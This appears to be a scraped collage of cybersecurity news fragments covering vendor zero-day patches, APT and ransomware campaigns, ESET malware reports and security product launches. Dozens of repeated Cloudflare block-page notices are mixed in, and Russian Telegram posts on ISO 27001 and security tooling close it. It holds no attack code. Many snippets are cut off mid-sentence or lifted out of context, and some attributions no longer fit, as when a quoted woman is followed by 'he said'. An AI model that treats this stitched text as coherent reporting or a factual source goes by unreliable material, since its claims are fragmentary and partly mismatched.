Earlier this month, Palo Alto Networks issued a fix for the high-severity bug (CVE-2022-0028) that it says adversaries attempted to exploit.

PAN-OS versions vulnerable to attack, with patches available, include PAN-OS prior to 10.2.2-h2, PAN-OS prior to 10.1.6-h6, PAN-OS prior to 10.0.11-h1, PAN-OS prior to 9.1.14-h4, PAN-OS prior to 9.0.16-h3 and PAN-OS prior to 8.1.23-h1.

CISA Adds Bug to KEV CatalogOn Monday, CISA added the Palo Alto Networks bug to its list of Known Exploited Vulnerabilities Catalog.

This type of attack allows an adversary to magnify the amount of malicious traffic they …

Fake travel reservations are exacting more pain from the travel weary, already dealing with the misery of canceled flights and overbooked hotels.

Warnings come from security researchers who say TA558 cybercriminals have revamped their 2018 campaigns with fake reservation emails that contain links – that if clicked – deliver a malicious malware payload containing a potpourri of malware variants.

ISO and RAR are single compressed files, that if executed, decompress the file and folder data inside of them.

TA558 conducted 27 campaigns with URLs in 2022, compared to just five campaigns total from 2018 through 2021.

This actor used a variety of delivery mechanisms including URLs, RAR attachments…

Separate fixes to macOS and iOS patch respective flaws in the kernel and WebKit that can allow threat actors to take over devices and are under attack.

Apple is urging macOS, iPhone and iPad users immediately to install respective updates this week that includes fixes for two zero-days under active attack.

One of the flaws is a kernel bug (CVE-2022-32894), which is present both in iOS and macOS.

“For most folks: update software by end of day,” tweeted Rachel Tobac, the CEO of SocialProof Security, regarding the zero-days.

The flaws in iOS are especially worrying, given the ubiquity of iPhones and users’ utter reliance on mobile devices for their daily lives, he said.

Google has patched the fifth actively exploited zero-day vulnerability discovered in Chrome this year as one in a series of fixes included in a stable channel update released Wednesday.

Google credits Ashley Shen and Christian Resell of its Google Threat Analysis Group (TAG) for reporting the zero-day bug, which could allow for arbitrary code execution, on July 19.

FedCM—short for the Federated Credential Management API–provides a use-case-specific abstraction for federated identity flows on the web, according to Google.

Fifth Chrome 0Day Patch So FarThe zero-day patch is the fifth Chrome bug under active attack that Google has patched so far this year.

In April, Google patched CVE-2022-136…

The North Korean APT is using a fake job posting for Coinbase in a cyberespionage campaign targeting users of both Apple and Intel-based systems.

North Korean APT Lazarus is up to its old tricks with a cyberespionage campaign targeting engineers with a fake job posting that attempt to spread macOS malware.

The malicious Mac executable used in the campaign targets both Apple and Intel chip-based systems.

However, the most recent malware is signed July 21, according to its timestamp, which means it’s either something new or a variant of the previous malware.

The malware used in the campaign also connects to a different command and control (C2) infrastructure than the malware discovered in May…

A U.K. water supplier suffered a disruption in its corporate IT systems Monday as a result of a cyber-attack but claims that its water supply was not affected.

Victim MisidentifiedThe Clop ransomware gang took responsibility for an attack on a U.K. water supplier on its dark web site, but said the victim was Thames Water and not South Staffordshire, according to a report posted on Bleepingcomputer.

Thames Water is the United Kingdom’s largest water supplier, serving 15 million customers in Greater London and other areas on the river that runs through the city.

Thames Water quickly took to its website to let all of its customers know that any media report claiming it suffered a cyber-attack …

WeChat Pay is a mobile payment and digital wallet service developed by a firm of the same name, which is based in China.

The service is used by over 300 million customers and allows Android users to make mobile payments and online transactions.

The core issue with Xiaomi phone was the mobile phones payment method and the Trusted Execution Environment (TEE) component of the phone.

Using a regular, unprivileged Android application, they were able to communicate with the trusted soter app via “SoterService,” an API for managing soter keys.

But the issue is even more significant for the Far East, where the market for mobile payments is already way ahead.

There was nothing typical this year at BSides LV, Black Hat USA and DEF CON – also known collectively as Hacker Summer Camp.

Belgian researcher Lennert Wouters revealed at Black Hat how he mounted a successful fault injection attack on a user terminal used to manage the satellite.

For fans of FUD, PC Magazine has a nice rundown of “The 14 Scariest Things We Saw at Black Hat 2022“.

Topics of DiscussionThe main Black Hat keynote was from Chris Krebs, former Cybersecurity and Infrastructure Security Agency (CISA), who shared his optimism when it comes to the US approach to information security.

ESET provided Black Hat attendees with an update on cyberattacks against Ukraine.

Zeppelin ransomware is back and employing new compromise and encryption tactics in its recent campaigns against various vertical industries—particularly healthcare—as well as critical infrastructure organizations, the feds are warning.

Tech companies also remain in the crosshairs of Zeppelin, with threat actors also using the RaaS in attacks against defense contractors, educational institutions and manufacturers, the agency said.

They then deploy Zeppelin ransomware as a .dll or .exe file or contained within a PowerShell loader.

Multiple EncryptionOnce Zeppelin ransomware is executed on a network, each encrypted file is appended with a randomized nine-digit hexadecimal number as a file exte…

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

In this blogpost, we provide a technical analysis of the Dolphin backdoor and explain its connection to previously documented ScarCruft activity.

Figure 1 provides an overview of the attack components leading to the execution of the Dolphin backdoor.

Dolphin installerEnsuing sections describe the installer and loader components responsible for the execution of the Dolphin backdoor in the analyzed attack scenario.

Portable devicesAmong regular drives, Dolphin also searches portable devices such as smartphones, using the Windows Portable Device (WPD) API.

IoCsSHA-1 Filename ESET detection name Description F9F6C0184CEE9C1E4E15C2A73E56D7B927EA685B N/A Win64/Agent.MS Dolphin backdoor version 1.9…

Even though the ransomware – called RansomBoggs by ESET and written in the .NET framework – is new, particularly the way it is deployed bears close resemblance to some past attacks attributed to the notorious threat actor.

ESET has alerted Ukraine’s Computer Emergency Response Team (CERT-UA) about the RansomBoggs onslaughts, which were first detected on November 21st.

Depending on the variant, RansomBoggs is detected by ESET products as MSIL/Filecoder.Sullivan.A and MSIL/Filecoder.RansomBoggs.A.

For example, back on February 23rd, just hours before Russia invaded Ukraine, ESET telemetry picked up HermeticWiper on the networks of several Ukrainian organizations.

Sign up to receive an email u…

The Bahamut APT group distributes at least eight malicious apps that pilfer victims’ data and monitor their messages and conversationsThis week, ESET researchers published their analysis of a malicious campaign where the Bahamut APT group targets Android users via trojanized versions of two legitimate VPN apps – SoftVPN and OpenVPN.

Since January 2022, Bahamut has distributed at least eight malicious apps in order to pilfer sensitive user data and actively spy on victims’ messaging apps.

These apps were never available for download from Google Play; instead, they were distributed through a fake SecureVPN website.

Watch the video to learn more.

Full technical details are available here: Baha…

The COVID-19 pandemic has further helped fuel the rise of online shopping, which is now worth over $4 trillion annually.

Mobile phones that double as wallets, face recognition systems that replace PIN codes, “pay later” options, disposable virtual cards, the list goes on.

Contactless payments through mobile wallets, like Google Pay and Apple Pay, are also good options that can be used in shops or online.

Payment aggregatorsWhile payment aggregators might be a name you haven’t heard of before, most of us know and have used PayPal or Square.

This is a very handy way of making online purchases without having to give away your card details.

Excited to get your hands on it, you open a link, and there you are, giving away personal information and duly entering your credit card details.

Much like with phony deals on gadgets or designer fashion, you may receive an offer for large gift card balance or a gift card that sets you back for far less than the card’s face value.

You can also use a payment processor such as PayPal and subscribe to an online shopping insurance.

Don’t use public Wi-Fi: Free Wi-Fi access points are certainly useful, but they also pose major risks and you should never use them for things like online shopping or banking.

With scammers on the lookout for the next victim, stay a step ahead by implementing these t…

This campaign has been active since January 2022 and malicious apps are distributed through a fake SecureVPN website that provides only Android apps to download.

]com was registered on 2022-01-27; however, the time of initial distribution of the fake SecureVPN app is unknown.

AnalysisSince the distribution website has been online, there have been at least eight versions of the Bahamut spyware available for download.

T1532 Archive Collected Data Bahamut spyware stores collected data in a database prior to exfiltration.

Command and Control T1437.001 Application Layer Protocol: Web Protocols Bahamut spyware uses HTTPS to communicate with its C&C server.

What is security fatigue and how bad is it?

Humans are often thought of as the weakest link in the corporate security chain.

This security fatigue is characterized by a feeling of helplessness and loss of control.

What are the top symptoms of security fatigue?

But it starts with understanding and tackling the causes of security fatigue.

What have some of the world’s most notorious APT groups been up to lately?

A new ESET report released this week has the answers.

What have advanced persistent threat (APT) groups been up to lately?

For example, even more than eight months after the Russian invasion, Ukraine continues to be a prime target for Russia-aligned APT groups.

To learn more, watch the video and read the report: ESET APT Activity Report T2 2022Sign up to receive an email update whenever a new article is published in our Ukraine Crisis – Digital Security Resource Center Submit

People who want to keep their online activities private are often faced with the question – should I use a virtual private network (VPN) or the Tor anonymity network?

Tor vs. VPN – how do they compare?

“Tor over VPN,” as it is called, will not let your ISP know you’re connected to the Tor network, adding one more layer of privacy.

Moreover, VPN connections may sometimes drop (without necessarily alerting you to it), exposing your use of Tor to your VPN provider, even if for brief moments.

This is when it might be advisable to use Tor over VPN or to run a Tor bridge.

Why open banking is a double-edged swordBut what does it mean to share your banking information?

The UK government, a pioneer in open banking, believes that by September 2023, 60% of the UK population will be using open banking.

Rogue mobile apps might lead you into believing that they are real apps with open banking features and will request banking credentials.

The trend is set, and open banking is being discussed all over the world.

At the same time, cybersecurity concerns around open banking present challenges and risks that are just around the corner – or are already here.

An overview of the activities of selected APT groups investigated and analyzed by ESET Research in T2 2022Today ESET Research publishes the very first ESET APT Activity Report, which summarizes the activities of selected advanced persistent threat (APT) groups that were observed, investigated, and analyzed by ESET researchers from May until the end of August 2022 (T2 2022).

APT groups are usually operated by a nation-state or by state-sponsored actors.

In T2 2022, we saw no decline in APT activity of Russia-, China-, Iran-, and North Korea-aligned threat actors.

Malicious activities described in ESET APT Activity Report T2 2022 are detected by ESET products; shared intelligence is based mos…

New ESET report shows how ever-growing threats impact SMB sentiment and why many SMBs are underprepared to defend against attacksThree in four SMBs believe that they are more vulnerable to cyberattacks than enterprises, ESET’s 2022 SMB Digital Security Sentiment Report published this week has found.

Indeed, budget limitations are one of the key challenges for IT teams in many businesses.

What other challenges are SMBs facing and what are some of the report’s key encouraging findings and takeaways?

To learn more and to read the report, head over here:Toward the cutting edge: SMBs contemplating enterprise security2022 ESET SMB Digital Security Sentiment ReportConnect with us on Facebook, Twit…

When in doubt, kick it out, plus other tips for hardening your cyber-defenses against World Cup-themed phishing and other scamsThe FIFA World Cup 2022 in Qatar is just about to kick off!

The real intention, however, is typically the same: get you to hand over your personal data or money or unwittingly download info-stealing malware into your device.

The email subject lines are not very creative, either – think “Qatar World Cup 2022 Lottery Winner”, “QATAR 2022 FIFA LOTTERY WINNER” or “CONGRATULATIONS, YOU HAVE WON THE QATAR FIFA 2022 MEGA WORLD CUP LOTTERY”.

Below is another example of a phishing email using the World Cup theme.

The image, embedded in an email message, includes a “Click Her…

Survey finds SMBs, weary of security failures, curious about detection and responseHow a company sees its digital security preparedness is critical.

Paying managed security service providers (MSSPs), with or without managed detection and response (MDR), is not inexpensive.

Nor is managing detection and response on your own, especially with the need to locate and retain experienced security admins.

However, with an average €220,000 loss to business due for each security breach/incident, SMBs are paying close attention to the changing endpoint security landscape.

With additional threats from ransomware and supply-chain attacks making life even harder, 2022 has seen SMBs vote with their feet.

Top digital security mistakes to avoid1.

Using and reusing weak passwordsThis is one of the most common security mistakes users make, as evidenced by the stats above.

Not using security software on all devicesMany of us appreciate the value of reputable security software.

We should protect them by giving digital security the time and attention it deserves.

Sign up to receive an email update whenever a new article is published in our Ukraine Crisis – Digital Security Resource Center Submit

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

72% of organizations remain vulnerable to the Log4Shell vulnerability as of October 1, 2022, Tenable‘s latest telemetry study has revealed, based on data collected from over 500 million tests.

A vulnerability that’s difficult to eradicateWhen Log4Shell was discovered in December 2021, organizations around the world scrambled to determine their risk.

One federal cabinet department reported that its security team devoted 33,000 hours to Log4j vulnerability response alone.

Yet nearly one third (29%) of these assets had recurrences of Log4Shell after full remediation was achieved.

The data highlights legacy vulnerability remediation challenges, which are the root cause of the majority of data b…

The FTC’s recent actions demonstrate a trend toward increased cybersecurity and data privacy scrutiny.

It intends to further expand its role in setting and enforcing cybersecurity and data privacy standards.

Prevent the disclosure of any nonaffiliated third-party marketer consumer’s personal information, access code to credit card, deposit, or transaction account.

Establish a company guideline for handling personal data and train staff on proper data-handling practices.

Waiting for a federal security and privacy lawThe FTC is expanding its role in setting and enforcing cybersecurity and data privacy standards.

Lookout researchers have discovered nearly 300 Android and iOS apps that trick victims into unfair loan terms, exfiltrate excessive user data from mobile devices, and then use it to pressure and shame the victims for repayment.

Android and iOS loan apps that lead to harassmentThe apps “purportedly offer quick, fully-digital loan approvals with reasonable loan terms.

“A number of users have reported that their loans come with hidden fees, high interest rates, and repayment terms that are much less favorable than what is posted on the app stores.

“Once the victim’s information is exfiltrated by the app and the loan is distributed, the collector then begins cycles of harassment.

While both app…

A recent report from the US Government Accountability Office (GAO) has shown that K-12 educational institutions are reluctant to report cyber incidents as they fear they would be penalized.

During the fiscal year of 2022, FSA received 409 incident reports, which was down from 460 of the previous year.

This isn’t a sign of reduced incidents occurring, but a sign of reduced reporting of incidents.

In this Help Net Security video, Stan Golubchik, CEO at ContraForce, talks about concerns of the lack of cyber incident reporting across K-12 school systems.

Defense contractors hold information that’s vital to national security and will soon be required to meet Cybersecurity Maturity Model Certification (CMMC) compliance to keep those secrets safe.

A shocking 87% of contractors have a sub-70 Supplier Performance Risk System (SPRS) score, the metric that shows how well a contractor meets Defense Federal Acquisition Regulation Supplement (DFARS) requirements.

Critics of the system have anecdotally deemed 70 to be “good enough,” but the overwhelming majority of contractors still come up short.

The DIB is the Pentagon’s supply chain, and we see how woefully unprepared contractors are despite being in threat actors’ crosshairs.

In addition to being …

A new report conducted by Enterprise Strategy Group (ESG) highlights why today’s security teams find it increasingly difficult to detect and stop cyber threats targeting their organizations.

The research found that 70% of organizations have fallen victim to an attack that used encrypted traffic to avoid detection.

Worryingly, 66% still don’t have visibility into all their encrypted traffic, leaving them highly vulnerable to further encrypted attacks.

The report shows that cybersecurity and networking professionals are struggling against rapidly increasing threat detection and response workloads, preventing analysts from dealing with sophisticated threats.

What’s more, many don’t have the sk…

NAVEX IRM Out-of-the-Box accelerates third party and IT risk managementNAVEX released NAVEX IRM (Integrated Risk Management) Out-of-the-Box solutions to help organizations stand-up IT and third party risk management programs.

Bearer Data Security Platform detects gaps within data security policies during coding and in productionBearer is a SaaS platform that enables scalable deployments and workflow automation for security management.

It discovers sensitive data flows automatically by continuously scanning source code and associated metadata.

It can also remediate data security issues at a massive scale, giving developers immediate actionable advice on how to mitigate as well as prioritize …

Delinea announced the latest release of Cloud Suite, its solution that controls privileged access and authorization for on-premise and cloud servers.

A new granular privilege elevation workflow allows users to request elevated privileges to execute specific commands or command sets that require full administrator rights.

Cloud Suite empowers customers with robust capabilities that help contain the impact of a potential breach and greatly reduce the likelihood of lateral movements.

“With this release of Cloud Suite, we are making it easier for our customers to apply finer, more granular controls for privileged access to their on-premise and public cloud servers which house their critical dat…

Sophos has released Sophos Managed Detection and Response (MDR) with new threat detection and response capabilities.

Sophos MDR and the new Sophos MarketplaceSophos is the first endpoint security provider delivering MDR across both its own product portfolio as well as end users’ existing security deployments.

In addition to Sophos MDR, Sophos Marketplace provides third-party integrations for Sophos’ portfolio of services, products and technologies.

Extended protection warrantySophos stands behind its MDR customers with the new Sophos Breach Protection Warranty that covers up to $1 million in response expenses for organizations protected by Sophos MDR Complete, Sophos’ most comprehensive MDR…

Viral Nation launches VN Secure, an AI-powered solution for screening social media conduct across major platforms and all media types to help companies mitigate reputation risk and potential brand crises.

The meteoric rise of the social media economy, has brought with it greater demand for responsible engagement and conduct across proliferating social media platforms.

“Frustratingly, the manual social media screening processes they’ve been using up to now are inconsistent, expensive, time-consuming, and highly susceptible to unconscious bias.

AI-powered analysis of all social media text, images, and transcribed video, as well as tagged posts and comments.

A moderation feature that automatic…

Amazon Web Services (AWS) has unveiled AWS Supply Chain, a new application that helps businesses increase supply chain visibility to make faster, more informed decisions that mitigate risks, lower costs, and improve customer experiences.

AWS Supply Chain is an application that improves supply chain visibility and provides actionable insights to help businesses optimize supply chain processes and improve service levels.

With AWS Supply Chain, businesses can more accurately anticipate supply chain risks, take inventory rebalancing actions to save costs, and meet customer expectations.

And this is just the beginning—we will continue our investment in AWS Supply Chain to help our customers solv…

Adaptive Shield announced new capabilities to discover and monitor 3rd party apps connected to the core SaaS stack.

With this new capability, Adaptive Shield is minimizing the risk that SaaS-to-SaaS, also known as 3rd party app access, presents.

Security teams can now quickly and easily manage sanctioned apps and discover unsanctioned apps that have access to the company’s data.

As a result, third-party app access has become the new executable file,” states Maor Bin, co-founder and CEO of Adaptive Shield.

In addition, the security team gains advanced reporting capabilities for effective and accurate risk assessments to drive actionable measures.

Datadog launches Universal Service Monitoring, which automatically detects all microservices across an organization’s environment and provides instant visibility into their health and dependencies—all without any code changes.

Universal Service Monitoring provides complete visibility into first- and third-party services and their dependencies, regardless of programming language they use.

“Universal Service Monitoring uses eBPF technology to solve this problem and reduce the mean-time-to-detection of issues.

Centralize dispersed service information : Instantly populate Datadog Service Catalog and enrich services with relevant owners, runbooks, on-call contact information and more to improve …

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

 

Сделал презентацию по обновлению ISO 27001:2022 ISO 27001:2022 What has changed.pdf from Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001

Моя презентация "ISO Survey 2021: ISO 27001 certificates".Сырые данные - https://www.iso.org/the-iso-survey.html

Как вы наверное знаете, я уже несколько лет собираю на Патреоне комплекты документов (рекомендации, чек-листы и шаблоны) полезные для внедрения СУИБ по ISO 27001 и обеспечения privacy (GDPR и ISO 27701):1. ISMS Implementation Toolkit (ISO 27001)2. Privacy Implementation Toolkit (GDPR and ISO 27701)Теперь все документы можно скачать и на российском сервисе Boosty - https://boosty.to/isms8020Подписывайтесь и поддержите этот проект!

Хочу вам напомнить, что рекомендации по внедрению СУИБ по стандарту ISO 27001 и подготовке к аудитам выложены на Boosty, язык русский - https://boosty.to/isms8020/posts/0f6f575a-26c3-4ff9-88fa-64799c3c9772

Обновил и опубликовал на Slideshare свою презентацию про стандарты и руководства по управлению ИБ при взаимодействии с поставщиками. Supply management 1.1.pdf from Andrey Prozorov, CISM

Опубликовал на SlideShare несколько своих старых презентаций по GDPR и Privacy:All about a DPIA - https://www.slideshare.net/AndreyProzorov/all-about-a-dpia-by-andrey-prozorov-20-220518pdfEmployee Monitoring and Privacy - https://www.slideshare.net/AndreyProzorov/employee-monitoring-and-privacypdfGDPR and Personal Data Transfers - https://www.slideshare.net/AndreyProzorov/gdpr-and-personal-data-transfers-11pdfGDPR and Security - https://www.slideshare.net/AndreyProzorov/gdpr-and-securitypdfGDPR RACI - https://www.slideshare.net/AndreyProzorov/gdpr-racipdfGDPR EU Institutions and bodies - https://www.slideshare.net/AndreyProzorov/gdpr-eu-institutions-and-bodiespdf

Я люблю и использую майндкарты уже 15 лет, а недавно обновил свою "Майндкарту о майндкартах", теперь она на английском языке.Скачать ее в PDF и Xmind можно тут - https://www.patreon.com/posts/65251502 или тут - https://boosty.to/isms8020/posts/c69bdcee-f0eb-48be-ab4a-29b1f84d1996А посмотреть прошлый вариант на русском языке тут - https://80na20.blogspot.com/2012/07/blog-post_10.html

На днях вышло официальное обновление стандарта ISO 27001, ISO/IEC 27001:2013/DAmd 1(en) Information technology — Security techniques — Information security management systems — Requirements — AMENDMENT 1. Теперь у нас новый список контролей (мер ИБ) в приложении А, теперь он выровнен с обновленным стандартом ISO 27002:2022, который мы также ожидаем со дня на день.Общее количество контролей сокращено до 93 (в основном путем объединения), добавлено 11 новых:5.7 Threat intelligence5.23 Information security for use of cloud services5.30 ICT readiness for business continuity7.4 Physical security monitoring8.9 Configuration management8.10 Information deletion8.11 Data masking8.12 Data leakage pre…

Вопрос который меня в последнее время сильно волнует. Будет очень круто если поучаствуете анонимно.Если вы еще не касались истории с импортозамещением — игнорируйте (хотя предположу, что коснулось многих).Собственно вопрос ↓

Наверное лучший роадмап по сертификациям в ИБ, отсортированный по направлениям и уровню сложности.В очередной раз в этом убедился.> https://pauljerimy.com/security-certification-roadmap/ <p.s выглядит это конечно страшно, но что не сделать ради многострочного статуса в Linkedin, да? 😁

Там в либе Apache Commons Text нашли уязвимость, позволяющую выполнять удаленное выполнение кода — CVE-2022-42889. Но несмотря на CVSS 9.8, уязвимость затрагивает только несколько методов, связанных с интерполяцией данных, что в целом выглядит не так критично.Поискать в коде можно по:StringLookupFactory.INSTANCE.interpolatorStringLookup().lookup()или StringSubstitutor.createInterpolator().replace()В любом случае возьмите на вооружение и если лень читать код просто пропатчите либы до новой версии 1.10, благо она уже вышла.Уязвимость затрагивает версии Apache Commons Text 1.5–1.9.Reports:https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/https://securi…

Если моделирование угроз (threat modeling) у вас тоже вызывает боль, либо это увлекательное занятие вам только предстоит, попробую сэкономить вам несколько десятков часов вашего времени и просто порекомендую начать с > https://shellsharks.com/threat-modelingИ неважно делаете вы модель угроз для приложения или инфраструктурного компонента. А еще пришла в голову мысль, что доступ к таким материалам при пентесте может сильно ускорить процесс получения результата :) Удачи!Никогда не забуду свою первую... ⛔️

Google опубликовала очень стильный проект H4CK1NG.GOOGLE (фактически GoogleCTF 22) с набором своих новых челленджей по разным направлениям, каждое из которых сопровождается крупнейшими видео-историями. Если вдруг заскучали после рабочего понедельника, можно провести вечер с пользой. В случае ступора можно сходить в дискорд проекта за подсказками или writeups — это уже для совсем ленивых :)Are you ready? [Y/N]https://h4ck1ng.googlePlaylist > https://www.youtube.com/playlist?list=PL590L5WQmH8dsxxz7ooJAgmijwOz0lh2H

В новой iOS 16 появился бекдор фича Rapid Security Responses, позволяющая патчить iPhone и аксессуары не дожидаясь обновления ОС. Должна включаться автоматом при обновлении на новую ОС.Идея с точки зрения ИБ конечно прикольная, но усложнит жизни любителям джейблрейка.

Cybershit8 622 subscribersО канале: http://telegra.ph/Cybershit-08-14Связь: Полезный канал про технологии и информационную безопасность.

Нам не поИБ на ИБ.

А вам?О канале: http://telegra.ph/Cybershit-08-14Связь: @cybrsht_botIf you have Telegram, you can view postand join Cybershit right away.

Если вы находитесь в поиске бюджетного инструмента для решения проблемы с паразитивным бот-трафиком, и у вас нет свободных финансов для приобретения какого-нибудь Cloudflare, можно посмотреть в сторону вот этих ультимативных репок для прокачки ваших Nginx или Apache.Настроенный веб-сервер под ключ одной кнопкой (почти). Ну либо если вам нужен какой-то докрученный кастом, то придется курить доки и конфиги из репы.https://github.com/mitchellkrogza/nginx-ultimate-bad-bot-blockerhttps://github.com/mitchellkrogza/apache-ultimate-bad-bot-blocker

Для тех, кто пропустил увлекательный доклад с недавнего BlackHat и DEFCON от представителей Rapid7 про их исследования ПО для Cisco ASA.В текущих реалиях, когда многие остались отрезанными от обновлений и подписок, готовы скачивать различные кряки, образа и клиенты для администрирования штата своих Cisco, такая тема кажется более чем актуальна.Если опустить рассказ про то, как Cisco выпустила патч не закрывающий зарепорченную уязвимость, то основные темы доклада всего две:– Установка вредоносного программного обеспечения для ASA и простые способы внедрения бекдоров в ПО администрирования Cisco ASDM.– Создание вредоносных установочных пакетов и загрузочных образов для модуля FirePOWER. Там в…

Киберпиздец8 640 subscribersО канале: http://telegra.ph/Cybershit-08-14Связь: Полезный канал про технологии и информационную безопасность.

Нам не поИБ на ИБ.

А вам?О канале: http://telegra.ph/Cybershit-08-14Связь: @cybrsht_botIf you have Telegram, you can view postand join Киберпиздец right away.

Наткнулся на проект Casdoor — это достаточно функциональная платформа для организации IAM и SSO с множеством интеграций, провайдеров и удобным интерфейсом. Может использоваться не только как IdP для OAuth, OIDC, SAML и CAS, но и как сервисный провайдер, а внутри куча крутилок для мапинга атрибутов, разные модели управления доступом (RBAC, ABAC, ACL), политики и даже поддержка WebAuthn!В целом выглядит все очень круто — репа с 3,5к звездочек, удобные демо, если хочется потыкать в живую, документация, API и готовый SDK и пр.Но нет ничего идеального. На гите десятки свежих issue, релизы выходят каждый день, а в демке бывает что-то не работает. Сложилось впечатление, что пытаются охватить необъ…

